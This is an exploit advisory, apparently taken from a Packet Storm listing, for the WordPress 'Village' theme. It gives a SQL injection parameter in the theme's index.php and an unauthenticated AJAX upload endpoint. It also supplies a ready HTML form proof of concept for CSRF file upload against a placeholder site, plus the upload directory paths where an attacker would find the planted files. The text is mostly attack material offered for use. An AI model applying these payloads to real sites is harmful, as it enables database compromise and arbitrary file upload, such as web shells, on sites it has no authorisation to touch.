\n \n#################################################################### \n \n# SQL Injection Exploit => \n*********************** \n/wp-content/themes/village/index.php?id=[SQL Injection] \n \n# Direct Access Exploit => \n*********************** \n/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php \n \nVulnerability Error => \n******************** \n{\"error\":\"No files were uploaded.\"} \n \n# CSRF File Upload Exploit Proof of Concept => \n****************************************** \n<form enctype=\"multipart/form-data\" \naction=\"VULNERABLESITEHERE/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php\" method=\"post\"> \nYour File: <input name=\"qqfile\" type=\"file\" /><br /> \n<input type=\"submit\" value=\"upload\" /> \n</form> \n \n# Directory File Paths : \n******************* \nSearch your files here in this folder. \n \n/wp-content/themes/village/blueprint/...... \n \n/wp-content/themes/village/...... \n \n/wp-content/uploads/[YEAR]/[MONTH]/..... \n \n/wp-content/uploads/...... \n \n#################################################################### \n \n# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team \n \n#################################################################### \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/151789/wpvillagethemes50-xsrfsql.txt"}]}